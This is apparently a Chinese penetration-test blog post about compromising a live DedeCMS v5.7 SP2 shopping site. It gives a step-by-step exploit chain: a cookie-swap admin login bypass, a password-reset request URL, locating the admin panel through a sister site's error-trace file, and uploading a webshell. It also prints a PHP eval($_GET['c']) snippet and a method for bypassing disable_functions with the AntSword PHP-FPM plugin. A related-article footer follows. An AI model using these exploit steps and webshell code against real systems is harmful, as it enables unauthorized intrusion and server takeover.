今天又是准备划水认真工作的一天,没想到一到公司领导就甩了个站过来,这可能就是打工人吧
话不多说来看看站,先信息收集一波

初步测试目标站点

打开进去是一个类似购物商城的地方,没有什么特殊的点,想要操作基本都要进行登录,中间件是nginx
再看看插件,惊喜来了,是dedecms

先直接盲打一波后台地址/dede 直接404......

再看看好歹有前台,先注册个用户

再查看最后更新时间

可以知道是dedecms v5.7 sp2的版本
这个版本之后有前台管理员密码重置漏洞和任意密码重置漏洞,可以试一下组合拳

1.先注册个00001账户,因为00001经过intval()后值为1(用来登录admin)

2.再访问/member/index.php?uid=00001的用户界面,获取响应包的last_vid__ckMd5值

3.访问/member/,替换DedeUserID为0001,DedeUserID__ckMd5的值为刚才的last_vid__ckMd5的值。

这时候就发现已经登录了admin的账户

再将这个修改操作放到浏览器上,修改浏览器的cookie,成功在网页上登录

这时候再配合dedecms最新版任意用户密码重置漏洞修改管理员密码

先点击下面连接请求key

http://X.X.X.X/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
点击之后,一闪而过的稍后跳转到修改页

马上就变成非法提交。。。

再用开始的链接去访问

但开始有请求成功的跳转链接,应该还是成功生成了key,再看看浏览记录,返回第一次的页面,再用我的黄金右手快速点击立即跳转,成功进入重置界面。

这里稍微提一下,这里重置完密码之后还要在前台的账户设置里再此修改密码,因为这个前台修改任意用户密码的洞只能改dede_member表里的用户信息,而管理员信息存在另一个表dede_admin中,所以要从前台登录管理员账户并修改dede_admin表里的密码,才是真正修改了管理员密码。

现在管理员账户密码都有了,就差老大难问题,找后台。

网上有些5.7 sp2的前台getshell,但都是伪前台,在sp1之后还是需要后台地址才能getshell
网上有大佬写的爆后台脚本,但只在windwos上能用,现在目标是Linux的系统

旁站数据库报错文件找出后台

经过一番查询,发现dedecms的data下有个mysqli_error_trace.inc文件,此文件记录mysql查询错误,如果有后台查询出现错误则会暴露后台路径。但是主站的报错都是plus目录下的

通过前期的信息收集找到该网站的真实ip,发现是华为云

一般这种站只要有旁站大概率可能也有使用了dedecms的站

通过ip反查域名,发现其旁站大多数都是同类型的公司站点

当时我用的云悉,结果只查出来一个.......这个站还不是dede(打脸打脸)

又在fofa上查,结果有一堆旁站,随便挑了一个域名直接把数据库报错文件的路径拼接上去,果然出现了一个没见过的路径

拼接这个路径到主站域名访问,成功找到后台

然后用之前拿到的管理员登陆后台->上传一句话->连接一气呵成

bypass disable_function

准备执行命令验证,发现函数都被禁用了

disable_functions : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

而且还有open_basedir限制了目录访问

为了方便绕过disable_function,先bypass open_basedir
可以使用代码

<?php
echo 'open_basedir: '.ini_get('open_basedir').'<br>';
echo 'GET: '.$_GET['c'].'<br>';
eval($_GET['c']);
echo 'open_basedir: '.ini_get('open_basedir');
?>

但是哥斯拉内置了bypass open_basedir的插件,就直接上哥斯拉了。连上之后发现还是有挺多网站的。

再把哥斯拉内置的bypassdisable_functions模块都试了一遍,都失败了。
再看看当前收集到的信息,服务器是Linux的,服务器中的PHP是用FPM/FastCGI的连接模式启动,当前目录可写

想到应该可以用PHP-FPM绕过disable_functions,在蚁剑中已经添加了这个bypass插件
先去插件市场下载安装绕过disable_functions插件,然后加载进来,选择PHP-FPM/FastCGI模式进行,FPM地址就用哥斯拉一顿乱找,Linux下可以看看/tmp目录。

注意这里的tmp前一定要加/

操作成功后,会显示成功上传代理脚本和一个so文件,在webshell目录下会多了个.antproxy.php文件,我们直接右键创建副本改地址为该代理PHP文件,再连接即可成功Bypass disable_functions:

提权

在浏览文件时发现存在phpmyadmin目录,前期信息收集得知该站点使用了宝塔,宝塔一般默认把phpmyadmin搭建在888端口上面,但是该网站并没有开启888端口,而且bypass后的shell总是两分钟就掉,有宝塔,又是hvv害怕把服务器提崩....所以就暂时渗透到这里吧。

总结:

在渗透过程中如果主站和旁站是一个类型的站点,那他们的目录结构也很可能相似,很多漏洞点也可能通用。

本文知识点:

1.通过dedecms最新版漏洞组合拳拿到管理员密码。

2.旁站信息收集

3.绕过disable_functions禁用函数

4.绕过open_basedir目录限制

一次旁站信息泄露的dedecms站点渗透相关推荐

  1. 信息收集--旁站信息收集

    提示:注意:网络安全环境需要大家共同维护,请大家共同遵守网络安全规章制度,仅供大家参考,造成的法律后果,不由本人承担 文章目录 一.旁站是什么? 二.旁站信息收集 nmap扫描获取旁站信息 第三方获取 ...

  2. 开源内容管理系统Drupal 修复信息泄露和 XSS 漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本周,开源的内容管理系统 Drupal 修复了多个信息泄露和跨站点脚本 (XSS) 漏洞,其中包括一个"严重"级别 ...

  3. 在线cms识别|旁站|c段|信息泄露|cms漏洞扫描|端口扫描|

    工具 onlinetools Windows python3.7的版本是ok的,kali python3.8的版本还存在问题 可以尝试用3.7版本尝试 在线cms识别|旁站|c段|信息泄露|工控|系统 ...

  4. Web渗透信息收集之域名、端口、服务、指纹、旁站、CDN和敏感信息

    [网络安全] 二.Web渗透信息收集之域名.端口.服务.指纹.旁站.CDN和敏感信息 最近开始学习网络安全和系统安全,接触到了很多新术语.新方法和新工具,作为一名初学者,感觉安全领域涉及的知识好广.好 ...

  5. Dedecms信息泄露漏洞(CVE-2018-6910)

    Dedecms-cve-2018-6910信息泄露漏洞 漏洞详情 DesdevDedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布.编辑.管理检索等于一体 ...

  6. 信息收集之——旁站、C段

    旁站和C段扫描 1.旁站的概念 ​ 旁站指的是同一服务器上的其他网站,很多时候,有些网站可能不是那么容易入侵.那么,可以查看该网站所在的服务器上是否还有其他网站.如果有其他网站的话,可以先拿下其他网站 ...

  7. 工作记录 信息收集之子域名旁站探测

    目前我认为信息收集有大致以下三部分组成 一,收集子域名(这个域名下的资产)收集,旁站(基于同一个服务器或者内网架设的网站)收集 1.在线网站 谷歌,FOFA(可以收集后台页面.....语法比较多,可以 ...

  8. 信息收集(四)之旁站和C段

    旁站是和已知目标站点在同一服务器但不同端口的站点,搜索到旁站后,先访问一下确定是不是自己需要的站点信息. 一.旁站 1.webscan.cc https://c.webscan.cc/ https:/ ...

  9. 【信息收集】用python对目标网站进行 C段扫描 与 旁站扫描(八)

    文章目录 一.旁站探测 1.1 设计思想 1.2 代码 二.C段扫描 2.1 设计思想 2.2 代码 三.Reference 一.旁站探测 1.1 设计思想 1.旁站的概念 ​ 旁站指的是同一服务器上 ...

最新文章

  1. html5移动端根据百度地图api获取详细地址
  2. R语言rev函数对数据对象(向量、dataframe通过行或者列)反序实战
  3. Unix和Linux的区别和联系
  4. SpringBoot: xxxx for method parameter type String is not present]
  5. boost::fusion::zip用法的测试程序
  6. pd.get_dummies()
  7. linux特殊权限位之setuid、setgid和sticky
  8. C++起航篇——bool类型,输入输出,命名空间
  9. windows 反弹shell_容器内反弹shell的51种姿势
  10. 在Reporting Services (RDL)中自动生成大量列
  11. D. Closest Equals(线段树)
  12. 孙正义:一个有远见的赌徒
  13. 如何用MATLAB编写FIR维纳滤波器,FIR维纳滤波器的Matlab仿真验证.ppt
  14. c#中panel控件有什么作用
  15. 三诺 n20g 微型计算机,入门级音箱再现经典 三诺N-20GIII评测
  16. 对比 GA 、PSO 、DE三种算法 求解连续优化问题的性能
  17. 很多情侣看了后,晚上再不关机了!
  18. xshell进入管理员模式
  19. 本地文件搜索工具 Everything 为什么速度这么快?
  20. window10下Oracle 12c详细安装教程

热门文章

  1. 高中生计算机创新大赛作品,2017 第十届“英特尔杯”全国大学生软件创新大赛获奖作品...
  2. linux权限-m,Linux笔记:权限管理
  3. Apache Spark概述
  4. 10行代码AC——1016 部分A+B (15分)
  5. Python去线性化趋势
  6. 银行应用_讲解人脸识别在银行的应用
  7. php基础教程文档,PHP5基础教程
  8. hyperion高光谱参数_收藏!光纤光谱仪在激光领域的典型应用
  9. java中序列化的serialVersionUID解释
  10. java中生成不重复随机的数字